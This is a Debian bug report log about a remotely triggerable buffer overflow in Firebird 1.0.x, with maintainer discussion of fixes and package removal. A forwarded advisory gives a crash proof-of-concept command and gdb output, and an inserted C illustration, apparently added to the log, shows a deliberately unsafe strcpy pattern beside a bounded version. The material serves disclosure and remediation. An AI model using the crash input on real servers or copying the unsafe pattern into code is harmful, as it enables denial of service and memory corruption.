Debian Bug report logs - #251458
firebird: remote vulnerability


Package: firebird; Maintainer for firebird is (unknown);

Reported by: Remco Seesink <raseesink@hotpop.com>

Date: Fri, 28 May 2004 16:18:10 UTC

Severity: grave

Tags: help, security

Fixed in version firebird/1.0.3-2

Done: Remco Seesink <raseesink@hotpop.com>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Grzegorz Prokopski (Debian Developer) <gadek@debian.org>:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Remco Seesink <raseesink@hotpop.com>:
New Bug report received and forwarded. Copy sent to Grzegorz Prokopski (Debian Developer) <gadek@debian.org>. (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Cc: noamr@beyondsecurity.com
Subject: firebird: remote vulnerability
Date: Fri, 28 May 2004 17:47:10 +0200
Package: firebird
Severity: grave
Tags: security, help

Hi,

While preparing an nmu for this package I became aware of a security problem
from the previous maintainer. (I am considering adopting.)

If somebody knows this is fixed in firebird 1.0.3 that would be useful
information to me.

Cheers,
Remco.

The problem is described in this e-mail:
--------------------------------------
Return-Path: <noamr@beyondsecurity.com>
X-Original-To: mdz@csh.rit.edu
Delivered-To: mdz@csh.rit.edu
Received: from mail.csh.rit.edu [129.21.60.6]
	by localhost with IMAP (fetchmail-6.2.5)
	for mdz@localhost (single-drop); Mon, 17 May 2004 09:06:55 -0700 (PDT)
Received: from klecker.debian.org (klecker.debian.org [194.109.137.218])
	by blacksheep.csh.rit.edu (Postfix) with ESMTP id CF1519C50
	for <mdz@csh.rit.edu>; Mon, 17 May 2004 12:05:12 -0400 (EDT)
Received: from l192-117-97-135.broadband.actcom.net.il (vizzini.securiteam.com) [192.117.97.135] 
	by klecker.debian.org with esmtp (Exim 3.35 1 (Debian))
	id 1BPkby-0007iv-00; Mon, 17 May 2004 18:05:07 +0200
Received: from [192.168.1.52] ([192.168.1.52])
	by vizzini.securiteam.com (8.12.11/8.12.11/Debian-3) with ESMTP id i4HG4YSD025759;
	Mon, 17 May 2004 19:04:35 +0300
From: Noam Rathaus <noamr@beyondsecurity.com>
Organization: Beyond Security
To: security@debian.org, team@security.debian.org
Subject: Security Vulnerability in Firefox Database
Date: Mon, 17 May 2004 19:04:54 +0300
User-Agent: KMail/1.6.2
Cc: SecurITeam News <news@securiteam.com>
MIME-Version: 1.0
Content-Disposition: inline
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Message-Id: <200405171904.54492.noamr@beyondsecurity.com>
Delivered-To: team@security.debian.org
X-Bogosity: No, tests=bogofilter, spamicity=0.000000, version=0.90.0

Hi,

I know that version LI-V6.2.908 Firebird 1.0 (1.0.2-2.1) is very old, but
there appears to be a remotely exploitable overflow in this program.

By issuing:
gsec -database 192.168.1.52:`perl -e'print ("A"x300)'`
-user whenever -password whatever

On a remote server, you can see that:
gdb /usr/lib/firebird/bin/ibserver
GNU gdb 6.1-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public
License, and you are
welcome to change it and/or distribute copies of it
under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show
warranty" for details.
This GDB was configured as "i386-linux"...(no debugging
symbols found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".

(gdb) r
Starting program: /usr/lib/firebird/bin/ibserver
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[Thread
debugging using libthread_db enabled]
[New Thread 1075462272 (LWP 31389)]
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[New
Thread 1092549552 (LWP 31392)]
[New Thread 1100938160 (LWP 31393)]
[Thread 1100938160 (LWP 31393) exited]
[Thread 1092549552 (LWP 31392) exited]
[New Thread 1092549552 (LWP 31396)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1092549552 (LWP 31396)]
0x08132223 in ERR_post ()


(gdb) bt
#0  0x08132223 in ERR_post ()
#1  0x080942ac in THD_wlck_unlock ()
#2  0x41414141 in ?? ()
#3  0x41414141 in ?? ()
#4  0x41414141 in ?? ()
#5  0x41414141 in ?? ()
#6  0x41414141 in ?? ()
#7  0x41414141 in ?? ()
#8  0x00414141 in ?? ()
#9  0x0000012c in ?? ()
...

Debian is currently not maintaining this version of the product, but I thought
it was worth mentioning.

-- 
Thanks
Noam Rathaus
CTO
Beyond Security Ltd.

Join the SecuriTeam community on Orkut:
http://www.orkut.com/Community.aspx?cmm=44441

-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (990, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.4.26-1-686
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8
--------------------------------------




Information forwarded to debian-bugs-dist@lists.debian.org, Grzegorz Prokopski (Debian Developer) <gadek@debian.org>:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Matt Zimmerman <mdz@debian.org>:
Extra info received and forwarded to list. Copy sent to Grzegorz Prokopski (Debian Developer) <gadek@debian.org>. (full text, mbox, link).


Message #10 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Matt Zimmerman <mdz@debian.org>
To: 251458@bugs.debian.org
Subject: [aviram@beyondsecurity.com: Firebird Database Remote Database Name Overflow]
Date: Tue, 1 Jun 2004 14:54:42 -0700
----- Forwarded message from Aviram Jenik <aviram@beyondsecurity.com> -----

Date: Tue, 1 Jun 2004 20:41:24 +0300
From: Aviram Jenik <aviram@beyondsecurity.com>
To: bugtraq@securityfocus.com
Subject: Firebird Database Remote Database Name Overflow

 Firebird Database Remote Database Name Overflow
------------------------------------------------------------------------

Article reference:
http://www.securiteam.com/unixfocus/5AP0P0UCUO.html


SUMMARY

<http://firebird.sourceforge.net> Firebird is "a relational database offering 
many ANSI SQL-92 features that runs on Linux, Windows, and a variety of Unix 
platforms. Firebird offers excellent concurrency, high performance, and 
powerful language support for stored procedures and triggers. It has been 
used in production systems, under a variety of names since 1981".

A vulnerability in Firebird Database's way of handling database names allows 
an unauthenticated user to cause the server to crash and overwrite a critical 
section of the stack used by the database.

DETAILS

Vulnerable Systems:
* Firebird Database version 1.0 (1.0.2-2.1) - Debian unstable

Immune Systems:
* Firebird Database version 1.5.0 (others are presumed to be immune as well)


By issuing:
gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever 
-password whatever

On a remote server, you can see that:
gdb /usr/lib/firebird/bin/ibserver
GNU gdb 6.1-debian Copyright 2004 Free Software Foundation, Inc. GDB is 
free software, covered by the GNU General Public
License, and you are welcome to change it and/or distribute copies of it 
under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for 
details.
This GDB was configured as "i386-linux"...(no debugging symbols 
found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".

(gdb) r
Starting program: /usr/lib/firebird/bin/ibserver
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[Thread
debugging using libthread_db enabled]
[New Thread 1075462272 (LWP 31389)]
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[New
Thread 1092549552 (LWP 31392)]
[New Thread 1100938160 (LWP 31393)]
[Thread 1100938160 (LWP 31393) exited]
[Thread 1092549552 (LWP 31392) exited]
[New Thread 1092549552 (LWP 31396)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1092549552 (LWP 31396)]
0x08132223 in ERR_post ()


(gdb) bt
#0  0x08132223 in ERR_post ()
#1  0x080942ac in THD_wlck_unlock ()
#2  0x41414141 in ?? ()
#3  0x41414141 in ?? ()
#4  0x41414141 in ?? ()
#5  0x41414141 in ?? ()
#6  0x41414141 in ?? ()
#7  0x41414141 in ?? ()
#8  0x00414141 in ?? ()
#9  0x0000012c in ?? ()
..

Solution:
Debian is currently not maintaining this version of the product, so it is 
recommended that you use a source code based installation.


ADDITIONAL INFORMATION

The information has been provided by <mailto:expert@securiteam.com> Noam 
Rathaus.


Regards, 
Aviram Jenik
Beyond Security Ltd.

http://www.BeyondSecurity.com
http://www.SecuriTeam.com

The First Integrated Network and Web Application Vulnerability Scanner:
http://www.beyondsecurity.com/webscan-wp.pdf




==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 

----- End forwarded message -----

-- 
 - mdz
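The bug class behind this report, as an added C illustration that is not Firebird's source: a client-controlled database name copied into a fixed stack buffer (the pattern that produces the 0x41414141 frames in the backtrace above), next to a bounded parser that rejects the advisory's 300-byte name before copying anything. DB_NAME_MAX, HOST_MAX and all struct and function names are assumptions, not Firebird identifiers.

```c
#include <stdio.h>
#include <string.h>

#define HOST_MAX    63    /* hypothetical limit on the host part */
#define DB_NAME_MAX 255   /* hypothetical limit on the database path */

enum parse_result {
    PARSE_OK = 0,
    PARSE_EMPTY_NAME,
    PARSE_HOST_TOO_LONG,
    PARSE_NAME_TOO_LONG
};

struct db_target {
    char host[HOST_MAX + 1];     /* "" when the connect string has no host part */
    char name[DB_NAME_MAX + 1];
};

/* Vulnerable pattern (hypothetical, not Firebird's source): the client-supplied
 * name is copied into a fixed stack buffer with no length check. Fed the
 * 300-byte name from the advisory, the copy runs past name[] into the saved
 * frame data, which is why the backtrace shows 0x41414141 ("AAAA") where
 * return addresses should be. Shown for comparison only; never called here. */
void parse_db_target_unsafe(const char *conn, struct db_target *out)
{
    char name[DB_NAME_MAX + 1];
    const char *colon = strchr(conn, ':');
    const char *db = colon ? colon + 1 : conn;

    strcpy(name, db);                      /* unbounded: overflows on long input */
    strcpy(out->name, name);
    out->host[0] = '\0';
}

/* Hardened form: measure first, reject oversized parts, copy only afterwards. */
enum parse_result parse_db_target(const char *conn, struct db_target *out)
{
    const char *colon = strchr(conn, ':');
    const char *db = conn;
    size_t host_len = 0, name_len;

    memset(out, 0, sizeof *out);

    /* "host:path" form; a leading colon or no colon at all means a local path. */
    if (colon && colon != conn) {
        host_len = (size_t)(colon - conn);
        db = colon + 1;
    }
    name_len = strlen(db);

    if (name_len == 0)
        return PARSE_EMPTY_NAME;
    if (host_len > HOST_MAX)
        return PARSE_HOST_TOO_LONG;
    if (name_len > DB_NAME_MAX)            /* the advisory's input fails here */
        return PARSE_NAME_TOO_LONG;

    memcpy(out->host, conn, host_len);     /* out was zeroed, so both stay terminated */
    memcpy(out->name, db, name_len);
    return PARSE_OK;
}

/* Constructs the advisory's connect string: "192.168.1.52:" followed by 300
 * 'A' bytes, what the perl one-liner on the page produces. Returns its length. */
size_t make_advisory_conn(char *buf, size_t sz)
{
    const char *host = "192.168.1.52:";
    size_t hl = strlen(host);

    if (sz < hl + 300 + 1)
        return 0;
    memcpy(buf, host, hl);
    memset(buf + hl, 'A', 300);
    buf[hl + 300] = '\0';
    return hl + 300;
}

/* Runs the hardened parser over the advisory input; 1 if rejected as too long. */
int advisory_input_rejected(void)
{
    char conn[400];
    struct db_target t;

    if (make_advisory_conn(conn, sizeof conn) == 0)
        return 0;
    return parse_db_target(conn, &t) == PARSE_NAME_TOO_LONG;
}

int main(void)
{
    struct db_target t;
    const char *ok = "192.168.1.52:/var/lib/firebird/data/employee.gdb";

    printf("advisory input rejected: %s\n", advisory_input_rejected() ? "yes" : "no");
    if (parse_db_target(ok, &t) == PARSE_OK)
        printf("host=%s name=%s\n", t.host, t.name);
    return 0;
}
```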



Information forwarded to debian-bugs-dist@lists.debian.org, Grzegorz Prokopski (Debian Developer) <gadek@debian.org>:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Remco Seesink <raseesink@hotpop.com>:
Extra info received and forwarded to list. Copy sent to Grzegorz Prokopski (Debian Developer) <gadek@debian.org>. (full text, mbox, link).


Message #15 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>
To: 251458@bugs.debian.org
Subject: firebird-1.0.3 also affected
Date: Fri, 4 Jun 2004 21:44:11 +0200
Hi,

I just updated the packages to 1.0.3 and was able to reproduce this bug 
on 1.0.2 and on 1.0.3. Which means 1.0.3 is also vulnerable. I don't know
if upstream 1.0.3 is affected but it seems likely.

The plan was to let version 1.0.3 coexist with 1.5.0. Unless this plan changes
upgrading to 1.5.0 doesn't provide a solution.

If anybody is interested in helping out to speed things up, updated
packages are here (which still contain this bug):

http://mentors.debian.net/debian/pool/main/

Cheers,
Remco.




Information forwarded to debian-bugs-dist@lists.debian.org, Grzegorz Prokopski (Debian Developer) <gadek@debian.org>:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to "Grzegorz B. Prokopski" <gadek@debian.org>:
Extra info received and forwarded to list. Copy sent to Grzegorz Prokopski (Debian Developer) <gadek@debian.org>. (full text, mbox, link).


Message #20 received at 251458@bugs.debian.org (full text, mbox, reply):

From: "Grzegorz B. Prokopski" <gadek@debian.org>
To: Remco Seesink <raseesink@hotpop.com>, 251458@bugs.debian.org
Subject: Re: Bug#251458: firebird-1.0.3 also affected
Date: Sat, 05 Jun 2004 16:38:12 -0400
In the message of Fri, 04-06-2004, 15:44, Remco Seesink writes: 
> Hi,
> 
> I just updated the packages to 1.0.3 and was able to reproduce this bug 
> on 1.0.2 and on 1.0.3. Which means 1.0.3 is also vulnerable. I don't know
> if upstream 1.0.3 is affected but it seems likely.
> 
> The plan was to let version 1.0.3 coexist with 1.5.0. Unless this plan changes
> upgrading to 1.5.0 doesn't provide a solution.
> 
> If anybody is interested in helping out to speed things up, updated
> packages are here (which still contain this bug):
> 
> http://mentors.debian.net/debian/pool/main/

I think it would be best to ask on firebird-devel mailing list.

I suspect they have produced a patch for that.

As soon as the packages w/ a proper fix are available I can sponsor
their upload to the official Debian archive.  I consider it almost
a "Release Critical" bug, which is bad, because Sarge might be
released (and frozen before that - which means: harder updates!) in
the not too distant future.

Cheers,

			Grzegorz B. Prokopski

PS: Just for the benefit of other people on the pkg-firebird mailing
list let me mention that the full record of this bugreport can be
viewed at:

	http://bugs.debian.org/251458

-- 
Grzegorz B. Prokopski <gadek@debian.org>
Debian GNU/Linux      http://www.debian.org
SableVM - LGPLed JVM  http://www.sablevm.org
Why SableVM ?!?       http://devel.sablevm.org/wiki/WhySableVM




Information forwarded to debian-bugs-dist@lists.debian.org, Grzegorz Prokopski (Debian Developer) <gadek@debian.org>:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Remco Seesink <raseesink@hotpop.com>:
Extra info received and forwarded to list. Copy sent to Grzegorz Prokopski (Debian Developer) <gadek@debian.org>. (full text, mbox, link).


Message #25 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>
To: firebird-devel@lists.sourceforge.net
Cc: 251458@bugs.debian.org
Subject: Patch for vulnerability firebird 1.0.3 ?
Date: Thu, 10 Jun 2004 21:07:44 +0200
Hello,

I am trying to fix a security bug on firebird 1.0.2 and 1.0.3 on debian. The details of the bug can be found here:
http://bugs.debian.org/251458

I was wondering if somebody already made a patch for this bug. The current plan is to support both firebird 1.0.3 and 1.5.0 in debian. This is why upgrading to 1.5.0 wouldn't help.

If there is no patch, any pointers to what source files are likely involved?

Cheers,
Remco Seesink.




Information forwarded to debian-bugs-dist@lists.debian.org, Grzegorz Prokopski (Debian Developer) <gadek@debian.org>:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Alex Peshkov <pes@insi.yaroslavl.ru>:
Extra info received and forwarded to list. Copy sent to Grzegorz Prokopski (Debian Developer) <gadek@debian.org>. (full text, mbox, link).


Message #30 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Alex Peshkov <pes@insi.yaroslavl.ru>
To: firebird-devel@lists.sourceforge.net
Cc: 251458@bugs.debian.org
Subject: Re: [Firebird-devel] Patch for vulnerability firebird 1.0.3 ?
Date: Wed, 16 Jun 2004 15:57:52 +0400
Remco Seesink wrote:

>Hello,
>
>I am trying to fix a security bug on firebird 1.0.2 and 1.0.3 on debian. The details of the bug can be found here:
>http://bugs.debian.org/251458
>
>I was wondering if somebody already made a patch for this bug. The current plan is to support both firebird 1.0.3 and 1.5.0 in debian. This is why upgrading to 1.5.0 wouldn't help.
>
>If there is no patch, any pointers to what source files are likely involved?
>  
>
Unfortunately, very many.
It was a rather big code review during which we tried to fix a great(!) 
lot of buffer overflows in the firebird sources.
In particular, this bug may be fixed relatively easily, but in my mind it 
makes no sense - there are a great many other overflows and some other 
security holes (including execution of arbitrary code with root rights) 
that were fixed in fb1.5.
It seems unreal to me to backport them all to 1.0, therefore if one 
cares about security - use 1.5.

>Cheers,
>Remco Seesink.
>
>
>  
>
Alex.





Information forwarded to debian-bugs-dist@lists.debian.org, Grzegorz Prokopski (Debian Developer) <gadek@debian.org>:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Remco Seesink <raseesink@hotpop.com>:
Extra info received and forwarded to list. Copy sent to Grzegorz Prokopski (Debian Developer) <gadek@debian.org>. (full text, mbox, link).


Message #35 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>
To: Alex Peshkov <pes@insi.yaroslavl.ru>, 251458@bugs.debian.org
Subject: Re: Bug#251458: [Firebird-devel] Patch for vulnerability firebird 1.0.3 ?
Date: Wed, 16 Jun 2004 19:42:29 +0200
On Wed, 16 Jun 2004 15:57:52 +0400
Alex Peshkov <pes@insi.yaroslavl.ru> wrote:

> Unfortunately, very many.
> It was a rather big code review during which we tried to fix a great(!) 
> lot of buffer overflows in the firebird sources.
> In particular, this bug may be fixed relatively easily, but in my mind it 
> makes no sense - there are a great many other overflows and some other 
> security holes (including execution of arbitrary code with root rights) 
> that were fixed in fb1.5.
> It seems unreal to me to backport them all to 1.0, therefore if one 
> cares about security - use 1.5.

Thank you for your reply. We will have to speed up the packaging of 1.5
and at least put some warnings on the 1.0.3 installation.

Cheers,
Remco.




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Steve Langasek <vorlon@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>. (full text, mbox, link).


Message #40 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Steve Langasek <vorlon@debian.org>
To: 251458@bugs.debian.org
Cc: Remco Seesink <raseesink@hotpop.com>, Ed Boraas <ed@debian.org>, php4-interbase@packages.qa.debian.org, python-kinterbasdb@packages.qa.debian.org, Nicolas Ledez <nledez@virtual-net.fr>, zope-kinterbasdbda@packages.qa.debian.org
Subject: Re: firebird: remote vulnerability
Date: Tue, 27 Jul 2004 02:34:32 -0700
[Message part 1 (text/plain, inline)]
Hello,

The firebird package in Debian has a long-standing remote security hole.
We should not release such a package in sarge.

Removing this package from sarge will also mean removing the
php4-interbase, python-kinterbasdb, and zope-kinterbasdbda packages;
therefore, as maintainers of these packages, I am cc:ing you to see if
any of you are willing to do the necessary work to get the firebird
package ready for release.

I understand that the bugs are supposed to be fixed in firebird 1.5,
which is not yet packaged.  If this is too much work to get done before
sarge, perhaps it makes sense to upload a firebird 1.0 package providing
only the client libraries?

Thanks,
-- 
Steve Langasek
postmodern programmer
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Remco Seesink <raseesink@hotpop.com>:
Extra info received and forwarded to list. Copy sent to Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>. (full text, mbox, link).


Message #45 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>
To: Steve Langasek <vorlon@debian.org>, Debian Firebird Group <pkg-firebird-general@lists.alioth.debian.org>
Cc: 251458@bugs.debian.org, ed@debian.org, php4-interbase@packages.qa.debian.org, python-kinterbasdb@packages.qa.debian.org, nledez@virtual-net.fr, zope-kinterbasdbda@packages.qa.debian.org
Subject: Re: firebird: remote vulnerability
Date: Tue, 27 Jul 2004 21:05:28 +0200
On Tue, 27 Jul 2004 02:34:32 -0700
Steve Langasek <vorlon@debian.org> wrote:
> The firebird package in Debian has a long-standing remote security
> hole. We should not release such a package in sarge.
> 
> Removing this package from sarge will also mean removing the
> php4-interbase, python-kinterbasdb, and zope-kinterbasdbda packages;
> therefore, as maintainers of these packages, I am cc:ing you to see if
> any of you are willing to do the necessary work to get the firebird
> package ready for release.
> 
> I understand that the bugs are supposed to be fixed in firebird 1.5,
> which is not yet packaged.  If this is too much work to get done
> before sarge, perhaps it makes sense to upload a firebird 1.0 package
> providing only the client libraries?

Hello,

Firebird 1.5.0 is currently waiting for the ftp-masters to be accepted to
get included in unstable. It has already received testing and it could provide
the libfirebird dependency which would satisfy existing packages. I believe
the current uploaded version does not do that yet, but that could be fixed easily.
A 1.5.1 version is also ready for upload. Daniel Urban <daniel@sente.pl> has
done most of the work, as have people from the mailing list
pkg-firebird-general@lists.alioth.debian.org

The 1.5 version is packaged as firebird2 and could live in the same
repository.

There is a need for firebird 1.0.3 besides the 1.5 version, but the 1.5
version includes extensive code reviews which fix many security related
bugs, not just #251458. 

There is also a package (ibwebadmin) waiting for my sponsor to upload it
which depends on php-interbase, until that happens it is not a problem for
the release :/

Cheers,
Remco.




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Steve Langasek <vorlon@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>. (full text, mbox, link).


Message #50 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Steve Langasek <vorlon@debian.org>
To: Remco Seesink <raseesink@hotpop.com>
Cc: Debian Firebird Group <pkg-firebird-general@lists.alioth.debian.org>, 251458@bugs.debian.org, ed@debian.org, nledez@virtual-net.fr
Subject: Re: firebird: remote vulnerability
Date: Tue, 27 Jul 2004 21:33:13 -0700
[Message part 1 (text/plain, inline)]
On Tue, Jul 27, 2004 at 09:05:28PM +0200, Remco Seesink wrote:
> On Tue, 27 Jul 2004 02:34:32 -0700
> Steve Langasek <vorlon@debian.org> wrote:
> > The firebird package in Debian has a long-standing remote security
> > hole. We should not release such a package in sarge.

> > Removing this package from sarge will also mean removing the
> > php4-interbase, python-kinterbasdb, and zope-kinterbasdbda packages;
> > therefore, as maintainers of these packages, I am cc:ing you to see if
> > any of you are willing to do the necessary work to get the firebird
> > package ready for release.

> > I understand that the bugs are supposed to be fixed in firebird 1.5,
> > which is not yet packaged.  If this is too much work to get done
> > before sarge, perhaps it makes sense to upload a firebird 1.0 package
> > providing only the client libraries?

> Firebird 1.5.0 is currently waiting for the ftp-masters to be accepted to
> get included in unstable. It has already received testing and it could provide
> the libfirebird dependency which would satisfy existing packages. I believe
> the current uploaded version does not do that yet, but that could be fixed easily.
> A 1.5.1 version is also ready for upload. Daniel Urban <daniel@sente.pl> has
> done most of the work, as have people from the mailing list
> pkg-firebird-general@lists.alioth.debian.org

> The 1.5 version is packaged as firebird2 and could live in the same
> repository.

> There is a need for firebird 1.0.3 besides the 1.5 version, but the 1.5
> version includes extensive code reviews which fix many security related
> bugs, not just #251458. 

As you have probably seen, firebird 1.5 has cleared the NEW queue now.

Can you elaborate on what the needs are for a firebird 1.0.3?  If the
libraries can be provided by the firebird2 package, and the firebird 1.0
server has too many security holes to be included in a stable release,
what's left in the 1.0 package that warrants keeping it around?  When I
asked James to look at this one, he did have misgivings about the
package rename, since there's no evident reason to keep two source
packages around; so I'd like to know there's a good answer for this.

In any case, at this point the quickest way to get these packages into
a releasable state, now that firebird2 is available, is to remove the
binary package from firebird (1.0) that contains the security problems,
so that this bug can be closed.  Once that's done, you can sort out
which package you want to provide the libraries in the long term; but
trying to make such changes now is likely to prejudice the chances of
any of these client packages making it into sarge.

Thanks,
-- 
Steve Langasek
postmodern programmer
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Remco Seesink <raseesink@hotpop.com>:
Extra info received and forwarded to list. Copy sent to Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>. (full text, mbox, link).


Message #55 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>
To: Steve Langasek <vorlon@debian.org>
Cc: pkg-firebird-general@lists.alioth.debian.org, 251458@bugs.debian.org, ed@debian.org, nledez@virtual-net.fr
Subject: Re: Bug#251458: firebird: remote vulnerability
Date: Wed, 28 Jul 2004 10:52:31 +0200
> Can you elaborate on what the needs are for a firebird 1.0.3?  If the
> libraries can be provided by the firebird2 package, and the firebird
> 1.0 server has too many security holes to be included in a stable
> release, what's left in the 1.0 package that warrants keeping it
> around?  When I asked James to look at this one, he did have
> misgivings about the package rename, since there's no evident reason
> to keep two source packages around; so I'd like to know there's a good
> answer for this.
>
> In any case, at this point the quickest way to get these packages into
> a releasable state, now that firebird2 is available, is to remove the
> binary package from firebird (1.0) that contains the security
> problems, so that this bug can be closed.  Once that's done, you can
> sort out which package you want to provide the libraries in the long
> term; but trying to make such changes now is likely to prejudice the
> chances of any of these client packages making it into sarge.

Well, frankly I am not the biggest supporter of keeping them both so I
might not know the comprehensive list of reasons, but this is what I
know:
1. When migrating to 1.5 you should backup with the old server and
   restore with the new. This is needed when ODS (On Disk Structure)
   changes are in the database format.
2. Not all applications will work out of the box from 1.0.x moving to
   1.5.x

I suggest people on pkg-firebird-general knowing more than I do to step
forward. If it was up to me I would remove firebird 1.0.3 from the archive
and put them on http://firebird.debian.net. libfirebird2-* would only
need to provide libfirebird and all existing packages should be happy
without recompile. libgds.so.0 is symlinked to fbclient.so.0. This is
tested with php4-interbase and an unpackaged binary (ibaccess).

If this would happen I am not so sure about the usefulness of the
firebird2 naming.

Cheers,
Remco.




Information stored:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Damyan Ivanov <divanov@creditreform.bg>:
Extra info received and filed, but not forwarded. (full text, mbox, link).


Message #60 received at 251458-quiet@bugs.debian.org (full text, mbox, reply):

From: Damyan Ivanov <divanov@creditreform.bg>
To: pkg-firebird-general@lists.alioth.debian.org
Cc: Steve Langasek <vorlon@debian.org>, 251458-quiet@bugs.debian.org, ed@debian.org, nledez@virtual-net.fr
Subject: Re: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability
Date: Wed, 28 Jul 2004 12:05:52 +0300
[Message part 1 (text/plain, inline)]
Hi, Remco and all,

My thoughts:

Remco Seesink wrote:
> Well, frankly I am not the biggest supporter of keeping them both so I
> might not know the comprehensive list of reasons, but this is what I
> know:
> 1. When migrating to 1.5 you should backup with the old server and
>    restore with the new. This is needed when ODS (On Disk Structure)
>    changes are in the database format.

This is not required. Newer servers can work with older databases. A 
file backup of the database is recommended just in case, but otherwise 
there should be no problems.

> 2. Not all applications will work out of the box from 1.0.x moving to
>    1.5.x

Do you have in mind some example incompatibility? I don't think there is 
something fatal.

> I suggest people on pkg-firebird-general knowing more than I do to step
> forward. If it was up to me I would remove firebird 1.0.3 from the archive
> and put them on http://firebird.debian.net.

I second this. 1.0.x is obsolete (according to the developers), but 
putting it somewhere just in case is very good.

> libfirebird2-* would only
> need to provide libfirebird and all existing packages should be happy
> without recompile. libgds.so.0 is symlinked to fbclient.so.0. This is
> tested with php4-interbase and an unpackaged binary (ibaccess).

Yes, this should work. (famous last words)

> If this would happen I am not so sure about the usefulness of the
> firebird2 naming.

Maybe we can rename it to firebird later, but I am not sure what 
reflections a rename will have right now, before sarge release.


Thanks,
dam

-- 
Damyan Ivanov                             Creditreform Bulgaria
divanov@creditreform.bg             http://www.creditreform.bg/
phone: +359(2)928-2611, 929-3993           fax: +359(2)920-0994
mobile: +359-88-856-6067      ICQ: 3028500      Y!M: dam3028500
[signature.asc (application/pgp-signature, attachment)]

Information stored:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Remco Seesink <raseesink@hotpop.com>:
Extra info received and filed, but not forwarded. (full text, mbox, link).


Message #65 received at 251458-quiet@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>
To: Damyan Ivanov <divanov@creditreform.bg>, 251458-quiet@bugs.debian.org
Cc: pkg-firebird-general@lists.alioth.debian.org, vorlon@debian.org, 251458-quiet@bugs.debian.org, ed@debian.org, nledez@virtual-net.fr
Subject: Re: Bug#251458: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability
Date: Wed, 28 Jul 2004 11:39:09 +0200
> > 2. Not all applications will work out of the box from 1.0.x moving to
> >    1.5.x
> 
> Do you have in mind some example incompatibility? I don't think there is 
> something fatal.

That could be true. I noticed ibconsole from IB6 doesn't work well with
firebird 1.5. It is complaining the version is too *old*.

Also firebird 1.5 is more strict with sql and can trigger bugs
not noticed in 1.0.x. Of course this is minor when developing, but can
be a pain for people just deploying. An example I ran into: doing an order
by in a select count(*) query is no longer allowed. (and shouldn't be)

There may be other issues.

Cheers,
Remco.




